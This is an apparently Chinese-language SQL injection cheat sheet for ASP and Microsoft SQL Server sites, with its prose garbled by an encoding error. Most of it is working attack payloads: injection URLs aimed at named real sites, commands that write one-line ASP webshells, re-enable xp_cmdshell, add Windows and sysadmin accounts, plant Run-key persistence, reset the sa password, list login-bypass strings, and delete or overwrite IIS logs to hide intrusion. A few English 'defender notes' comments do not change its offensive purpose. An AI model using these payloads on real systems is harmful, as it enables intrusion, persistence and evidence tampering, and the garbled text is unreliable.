1銆?  鐢╚杞箟瀛楃鏉ュ啓ASP(涓鍙ヨ瘽鏈ㄩ┈)鏂囦歡鐨勬柟娉?
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

?   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2銆?  鏄劇ずSQL緋葷粺鐗堟湰錛?
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp錛岃17
3銆?  鍦ㄦ嫻嬬儲灝間腑鍥界殑緗戠珯婕忔礊鏃訛紝鍒嗘槑宸茬粡紜畾浜嗘紡媧炲瓨鍦ㄥ嵈鏃犳硶鍦ㄨ繖涓夌婕忔礊涓壘鍒板搴旂殑綾誨瀷銆傚伓鐒墮棿鎴戞兂鍒頒簡鍦⊿QL璇█涓彲浠ヤ嬌鐢?#8220;in”鍏抽敭瀛楄繘琛屾煡璇紝渚嬪“select * from mytable where id in(1)”錛屾嫭鍙蜂腑鐨勫煎氨鏄垜浠彁浜ょ殑鏁版嵁錛屽畠鐨勭粨鏋滀笌浣跨敤“select * from mytable where id=1”鐨勬煡璇㈢粨鏋滃畬鍏ㄧ浉鍚屻傛墍浠ヨ闂〉闈㈢殑鏃跺欏湪URL鍚庨潰鍔犱笂“) and 1=1 and 1 in(1”鍚庡師鏉ョ殑SQL璇彞灝卞彉鎴愪簡“select * from mytable where id in(1) and 1=1 and 1 in(1)”錛岃繖鏍峰氨浼氬嚭鐜版湡寰呭凡涔呯殑欏甸潰浜嗐傛殏涓斿氨鍙繖縐嶇被鍨嬬殑婕忔礊涓?#8220;鍖呭惈鏁板瓧鍨?#8221;鍚э紝鑱槑鐨勪綘涓瀹氭兂鍒頒簡榪樻湁“鍖呭惈瀛楃鍨?#8221;鍛€傚浜嗭紝瀹冨氨鏄敱浜庣被浼?#8220;select * from mytable where name in(‘firstsee’)”鐨勬煡璇㈣鍙ラ犳垚鐨勩?br>
4銆?  鍒ゆ柇xp_cmdshell鎵╁睍瀛樺偍榪囩▼鏄惁瀛樺湪錛?br>http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
鎭㈠xp_cmdshell鎵╁睍瀛樺偍鐨勫懡浠わ細
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--

5銆?  鍚戝惎鍔ㄧ粍涓啓鍏ュ懡浠よ鍜屾墽琛岀▼搴忥細
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6銆?  鏌ョ湅褰撳墠鐨勬暟鎹簱鍚嶇О錛?br>?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n鏀規垚0,1,2,3……灝卞彲浠ヨ法搴撲簡
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp錛岃17
7銆?  鍒楀嚭褰撳墠鎵鏈夌殑鏁版嵁搴撳悕縐幫細
select * from master.dbo.sysdatabases   鍒楀嚭鎵鏈夊垪鐨勮褰?br>select name from master.dbo.sysdatabases 浠呭垪鍑簄ame鍒楃殑璁板綍

8銆?  涓嶉渶xp_cmdshell鏀寔鍦ㄦ湁娉ㄥ叆婕忔礊鐨凷QL鏈嶅姟鍣ㄤ笂榪愯CMD鍛戒護錛?br>CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
-- Purpose: capture the output of an OS command in the MYTMP table (created on the line just
-- above this block) without xp_cmdshell, by driving WScript.Shell and
-- Scripting.FileSystemObject through the OLE Automation procedures
-- sp_OACreate / sp_OAMethod / sp_OAGetProperty.
-- Defender notes: by default these procedures are executable only by members of sysadmin,
-- so a call to them from a web application's login is itself the signal to alert on; on
-- SQL Server 2005 and later the 'Ole Automation Procedures' configuration option turns them
-- off entirely, and on any version an audit of sp_OACreate calls catches this pattern.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
-- The last argument of run (true) makes it wait for the started process to exit before
-- returning; the original note says this is needed for long-running commands such as ping.
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- opentextfile returns a TextStream object, so @file holds an object token rather than a value.
-- @shell is the object token from sp_OACreate; WHILE @shell>0 is the original's way of
-- writing "loop until BREAK" -- the loop only ends when AtEndOfStream is reached.
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
-- Same OLE Automation read-back loop as the script above, with a different command handed to
-- run: adsutil.vbs rewriting the W3SVC InProcessIsapiApps metabase list.  MYTMP is not
-- created in this batch, so it relies on the table from the previous script still existing.
-- Defender notes: a change to InProcessIsapiApps originating from the SQL Server service
-- account is not a normal administrative path and is worth alerting on, as is any
-- sp_OACreate call issued by an application login.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- @shell is an object token; the loop ends only via BREAK once AtEndOfStream is set.
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

浠ヤ笅鏄竴琛岄噷闈㈠皢WEB鐢ㄦ埛鍔犲埌綆$悊鍛樼粍涓細
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

浠ヤ笅鏄竴琛屼腑鎵цEXE紼嬪簭錛?br>DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL涓嬩笁縐嶆墽琛孋MD鍛戒護鐨勬柟娉曪細

鍏堝垹闄?.18鍙鋒棩蹇楋細
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

錛?錛夐鍏堝紑鍚痡et娌欑洏妯″紡錛岄氳繃鎵╁睍瀛樺偍榪囩▼xp_regwrite淇敼娉ㄥ唽琛ㄥ疄鐜幫紝綆$悊鍛樹慨鏀規敞鍐岃〃涓嶈兘棰勯槻鐨勫師鍥犮傚嚭浜庡畨鍏ㄥ師鍥狅紝榛樿娌欑洏妯″紡鏈紑鍚紝榪欏氨鏄負浠涔堥渶瑕亁p_regwrite鐨勫師鍥狅紝鑰寈p_regwrite鑷沖皯闇瑕丏B_OWNER鏉冮檺錛屼負浜嗘柟渚匡紝榪欓噷寤鴻浣跨敤sysadmin鏉冮檺嫻嬭瘯錛?br>?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
娉細
0   紱佹涓鍒囷紙榛樿錛?br>1   浣胯兘璁塊棶ACCESS錛屼絾鏄姝㈠叾瀹?br>2   紱佹璁塊棶ACCESS錛屼絾鏄嬌鑳藉叾浠?br>3   浣胯兘涓鍒?br>
?   榪欓噷浠呯粰鍑簊ysadmin鏉冮檺涓嬩嬌鐢ㄧ殑鍛戒護錛?br>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   寤虹珛閾炬帴鏁版嵁搴?L0op8ack'鍙傝冨懡浠わ細
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   濡備綍浣跨敤閾炬帴鏁版嵁搴擄細

浣跨敤榪欎釜鏂瑰紡鍙互鎵ц錛屼絾鏄緢涓嶅垢錛孌B_OWNER鏉冮檺鏄笉澶熺殑錛岄渶瑕佽嚦灝憇ysadmin鏉冮檺鎴栬卻ecurityadmin+setupadmin鏉冮檺緇勫悎
sp_addlinkedserver闇瑕乻ysadmin鎴杝etupadmin鏉冮檺
sp_addlinkedsrvlogin闇瑕乻ysadmin鎴杝ecurityadmin鏉冮檺
鏈緇堝彂鐜幫紝榪樻槸sa鏉冮檺鎴栬卻etupadmin+securityadmin鏉冮檺甯愭埛鎵嶈兘浣跨敤錛?br>涓鑸病鏈夊摢涓鐞嗗憳榪欎箞璁劇疆鏅氬笎鎴鋒潈闄愮殑

瀹炵敤鎬т笉寮猴紝浠呬綔涓轟竴涓涔犳葷粨鍚?br>
澶ц嚧榪囩▼濡備笅錛屽鏋滀笉鏄痵ysadmin錛岄偅涔圛AS.mdb鏉冮檺楠岃瘉浼氬嚭閿欙紝
鎴戞祴璇曠殑鏃跺欐巿浜坔acker榪欎釜鐢ㄦ埛setupadmin+securityadmin鏉冮檺錛屼嬌鐢╥as.mdb澶辮觸
闇瑕佹壘涓涓竴鑸敤鎴峰彲璁塊棶鐨刴db鎵嶅彲浠ワ細

?   鏂板緩閾炬帴鏈嶅姟鍣?#8221;L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--鎴?br>exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

鍐嶈冭礉涓涓叾瀹冩枃浠舵潵浠f浛7.18鏃ユ枃浠訛細
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9銆?  鐢║PDATE鏉ユ洿鏂拌〃涓殑鏁版嵁錛?br>HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www鐢ㄦ埛瀵嗙爜鐨?6浣峂D5鍊間負錛歛0b923820dcc509a錛屽嵆鎶婂瘑鐮佹敼鎴?錛?br>32浣峂D5鍊間負錛?  錛屽瘑鐮佷負

10銆?  鍒╃敤琛ㄥ唴瀹瑰鎴愭枃浠跺姛鑳?br>SQL鏈塀CP鍛戒護錛屽畠鍙互鎶婅〃鐨勫唴瀹瑰鎴愭枃鏈枃浠跺茍鏀懼埌鎸囧畾浣嶇疆銆傚埄鐢ㄨ繖欏瑰姛鑳斤紝鎴戜滑鍙互鍏堝緩涓寮犱復鏃惰〃錛岀劧鍚庡湪琛ㄤ腑涓琛屼竴琛屽湴杈撳叆涓涓狝SP鏈ㄩ┈錛岀劧鍚庣敤BCP鍛戒護瀵煎嚭褰㈡垚ASP鏂囦歡銆?br>鍛戒護琛屾牸寮忓涓嬶細
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'鍙傛暟涓烘墽琛屾煡璇㈢殑鏈嶅姟鍣紝'U'鍙傛暟涓虹敤鎴峰悕錛?P'鍙傛暟涓哄瘑鐮侊紝鏈緇堜笂浼犱簡涓涓猺uncommand.asp鐨勬湪椹?銆?br>
11銆佸垱寤鴻〃銆佹挱鍏ユ暟鎹拰璇誨彇鏁版嵁鐨勬柟娉?br>?   鍒涘緩琛細
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   寰琛ㄩ噷鎾叆鏁版嵁錛?br>' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   浠庤〃閲岃鍙栨暟鎹細
' and 1=(select count(*) from cyfd where gyfd >1)--

?   鍒犻櫎涓存椂琛細
';drop table cyfd;--

12銆侀氳繃SQL璇彞鐩存帴鏇存敼sa鐨勫瘑鐮侊細
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,榪欐牱sa鐨勫瘑鐮佸氨琚垜浠敼鎴愪簡111111鎷夈傚懙鍛碉紝瑙e喅鐨勬柟娉曞氨鏄妸sa緇欏垹鎷夈傦紝鎬庝箞鍒犲彲浠ュ弬鑰冩垜鐨勩婂畬鍏ㄥ垹闄a榪欎釜鍚庨棬銆嬨?br>
?   鏌ョ湅鏈満鎵鏈夌殑鏁版嵁搴撶敤鎴峰悕錛?br>select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   鏇存敼sa鍙d護鏂規硶錛氱敤sql緇煎悎鍒╃敤宸ュ叿榪炴帴鍚庯紝鎵ц鍛戒護錛?br>exec sp_password NULL,'鏂板瘑鐮?,'sa'

13銆佹煡璇vbbs搴撲腑鎵鏈夌殑琛ㄥ悕鍜岃〃緇撴瀯錛?br>?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14銆佹墜宸ュ浠藉綋鍓嶆暟鎹簱錛?br>瀹屽叏澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
宸紓澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT鈥?br>
15銆佹坊鍔犲拰鍒犻櫎涓涓猄A鏉冮檺鐨勭敤鎴穞est錛?br>exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16銆乻elect * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
灝卞彲浠ュ垪鍑哄簱ChouYFD涓墍鏈夌殑鐢ㄦ埛寤虹珛鐨勮〃鍚嶃?br>Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17銆?br>?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns 錛坵here id=1234錛?br>鍒楀嚭rdweb搴撲腑鎵鏈夎〃涓殑瀛楁鍚嶇О
?   select * from dvbbs.dbo.syscolumns where id=5575058
鍒楀嚭搴揹vbbs涓〃id=5575058鐨勬墍鏈夊瓧孌靛悕

18銆佸垹闄よ褰曞懡浠わ細delete from Dv_topic where boardid=5 and topicid=7978

19銆佺粫榪囩櫥褰曢獙璇佽繘鍏ュ悗鍙扮殑鏂規硶鏁寸悊錛?br>1) ' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6錛塷r 1=1--
7錛?or ’a=’a
8錛? or "a"="a
9錛?’) or (’a’=’a
10錛?") or ("a"="a
11錛?錛?or (1=1
12) 'or''='
13) 浜烘皵%’ and 1=1 and ’%’=’

20銆佸鎵劇綉绔欒礬寰勭殑鏂規硶姹囨伙細
1錛夋煡鐪媁EB緗戠珯瀹夎鐩綍鍛戒護錛?br>?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 錛堝皢2鎹㈡垚1銆?銆?銆?璇曡瘯錛?br>type c:\test1.txt
del c:\test1.txt
鍦∟BSI涓嬪彲浠ョ洿鎺ユ樉紺鴻繍琛岀粨鏋滐紝鎵浠ヤ笉鐢ㄥ鍑哄埌鏂囦歡

2錛夊湪緗戠珯涓婇殢渚挎壘鍒頒竴涓浘鐗囩殑鍚嶅瓧 123.jpg
鐒跺悗鍐欒繘鎵瑰鐞嗙▼搴?23.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

鎵ц鍚?type c:\123.txt
榪欐牱鏉ュ垎鏋愮綉绔欑殑璺緞

3錛塖QL鏈嶅姟鍣ㄥ拰緗戠珯鏈嶅姟鍣ㄥ湪鍚屼竴涓湇鍔″櫒涓婏紝濂戒簡鏄彲浠ユ墽琛屽懡浠ゆ槸鍚э紵
灝嗘墽琛屽懡浠よ緭鍑虹粨鏋滃埌
%windir%\help\iishelp\common\404b.htm鎴栬?00.asp
娉ㄦ剰杈撳嚭鍓岯ackup榪欎袱涓枃浠?br>濡傦細
dir c:\ >%windir%\help\iishelp\common\404b.htm
鐒跺悗闅忎究杈撳叆涓涓枃浠舵潵璁塊棶錛歨ttp://鐩爣ip/2.asp

4錛夐拡瀵箇in2000緋葷粺錛歺p_regread璇誨彇HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 鑾峰彇WEB璺緞
2003緋葷粺錛歺p_regread璇誨彇錛屾湭鎵懼埌鏂規硶
濡傦細
錛?錛?  鏂板緩涓涓〃cyfd(瀛楁涓篻yfd)錛?a target=_blank>http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
錛?錛?  鎶妛eb璺緞鍐欒繘鍘?http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
錛?錛?  榪樻槸璁╀粬涓嶅尮閰嶏紝鏄劇ず閿欒:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 灝?varchar 鍊?'Y:\Web\鐑熷彴浜烘墠鐑嚎鍚庡彴綆$悊緋葷粺,,201 ' 杞崲涓烘暟鎹被鍨嬩負 int 鐨勫垪鏃跺彂鐢熻娉曢敊璇?br>TargeSite: Boolean Read() 鍝堝搱鍝堛傘傝礬寰勬毚闇蹭簡銆傘?br>錛?錛夋帴涓嬫潵鍒犻櫎琛?http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5錛夌敤regedit鍛戒護瀵煎嚭娉ㄥ唽琛紝灝嗗鍑虹殑緇撴灉淇濆瓨鐨勮礬寰勫埌%windir%\help\iishelp\common\404b.htm鎴栬?00.asp欏甸潰
regedit鍛戒護璇存槑錛?br>Regedit /L:system /R:user /E filename.reg Regpath
鍙傛暟鍚箟錛?br>/L錛歴ystem鎸囧畾System.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/R錛歶ser鎸囧畾User.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/E錛氭鍙傛暟鎸囧畾娉ㄥ唽琛ㄧ紪杈戝櫒瑕佽繘琛屽鍑烘敞鍐岃〃鎿嶄綔錛屽湪姝ゅ弬鏁板悗闈㈢┖涓鏍鹼紝杈撳叆瀵煎嚭娉ㄥ唽琛ㄧ殑鏂囦歡鍚嶃?br>Regpath錛氱敤鏉ユ寚瀹氳瀵煎嚭鍝釜娉ㄥ唽琛ㄧ殑鍒嗘敮錛屽鏋滀笉鎸囧畾錛屽垯灝嗗鍑哄叏閮ㄦ敞鍐岃〃鍒嗘敮銆傚湪榪欎簺鍙傛暟涓紝"/L錛歴ystem"鍜?/R錛歶ser"鍙傛暟鏄彲閫夐」錛屽鏋滀笉浣跨敤榪欎袱涓弬鏁幫紝娉ㄥ唽琛ㄧ紪杈戝櫒鍒欒涓烘槸瀵?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬬殑"system.dat"鍜?user.dat"鏂囦歡榪涜鎿嶄綔銆傚鏋滄槸閫氳繃浠庤蔣鐩樺惎鍔ㄥ茍榪涘叆DOS錛岄偅涔堝氨蹇呴』浣跨敤"/L"鍜?/R"鍙傛暟鏉ユ寚瀹?system.dat"鍜?user.dat"鏂囦歡鐨勫叿浣撹礬寰勶紝鍚﹀垯娉ㄥ唽琛ㄧ紪杈戝櫒灝嗘棤娉曟壘鍒板畠浠傛瘮濡傝錛屽鏋滈氳繃鍚姩鐩樿繘鍏OS錛屽垯澶囦喚娉ㄥ唽琛ㄧ殑鍛戒護鏄?Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",璇ュ懡浠ょ殑鎰忔濇槸鎶婃暣涓敞鍐岃〃澶囦喚鍒?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬶紝鍏舵枃浠跺悕涓?regedit.reg"銆傝屽鏋滆緭鍏ョ殑鏄?regedit /E D:\regedit.reg"榪欐潯鍛戒護錛屽垯鏄鎶婃暣涓敞鍐岃〃澶囦喚鍒癉鐩樼殑鏍圭洰褰曚笅錛堢渷鐣ヤ簡"/L"鍜?/R"鍙傛暟錛夛紝鍏舵枃浠跺悕涓?Regedit.reg"銆?br>
regedit /s c:\adam.reg 錛堝鍏:\adam.reg鏂囦歡鑷蟲敞鍐岃〃錛?br>regedit /e c:\web.reg 錛堝浠藉叏閮ㄦ敞鍐屽唴瀹瑰埌c:\web.reg涓級
閽堝win2000緋葷粺錛欳:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
鐒跺悗http://鐩爣IP/2.asp
閽堝win2003緋葷粺錛氭病鏈夋壘鍒幫紝甯屾湜鎵懼埌鐨勬湅鍙嬪叕甯冨嚭鏉ヤ竴璧瘋璁恒?br>
6錛夎櫄鎷熶富鏈轟笅%SystemRoot%\system32\inetsrv\MetaBack\涓嬬殑鏂囦歡鏄痠is鐨勫浠芥枃浠訛紝鏄厑璁竪eb鐢ㄦ埛璁塊棶鐨勶紝濡傛灉浣犵殑iis澶囦喚鍒拌繖閲岋紝鐢╳ebshell涓嬭澆涓嬫潵鍚庣敤璁頒簨鏈墦寮錛屽彲浠ヨ幏鍙栧搴旂殑鍩熷悕鍜寃eb緇濆璺緞銆?br>
7錛塖QL娉ㄥ叆寤虹珛铏氭嫙鐩綍錛屾湁dbo鏉冮檺涓嬫壘涓嶅埌web緇濆璺緞鐨勪竴縐嶈В鍐沖姙娉曪細
鎴戜滑寰堝鎯呭喌涓嬮兘閬囧埌SQL娉ㄥ叆鍙互鍒楃洰褰曞拰榪愯鍛戒護錛屼絾鏄嵈寰堜笉瀹規槗鎵懼埌web鎵鍦ㄧ洰褰曪紝涔熷氨涓嶅ソ寰楀埌涓涓獁ebshell錛岃繖涓鎷涗笉閿欙細
?   寤虹珛铏氭嫙鐩綍win,鎸囧悜c:\winnt\system32錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
?   璁﹚in鐩綍鍏鋒湁瑙f瀽asp鑴氭湰鏉冮檺錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?   鍒犻櫎铏氭嫙鐩綍win錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   嫻嬭瘯錛?a target=_blank>http://127.0.0.1/win/test.asp
8錛夊埄鐢⊿QL璇彞鏉ユ煡鎵網EB鐩綍錛氭牴鎹粡楠岋紝鐚滅枒WEB鏍圭洰褰曠殑欏哄簭鏄細d鐩樸乪鐩樸乧鐩橈紝棣栧厛鎴戜滑寤虹珛涓涓復鏃惰〃鐢ㄤ簬瀛樻斁master..xp_dirtree(閫傚悎浜巔ublic)鐢熸垚鐨勭洰褰曟爲,鐢ㄤ互涓嬭鍙ワ細
;create table temp(dir nvarchar(255),depth varchar(255));--,璇ヨ〃鐨刣ir瀛楁琛ㄧず鐩綍鐨勫悕縐幫紝depth瀛楁琛ㄧず鐩綍鐨勬繁搴︺傜劧鍚庢墽琛寈p_dirtree鑾峰緱D鐩樼殑鐩綍鏍戯紝璇彞濡備笅錛?
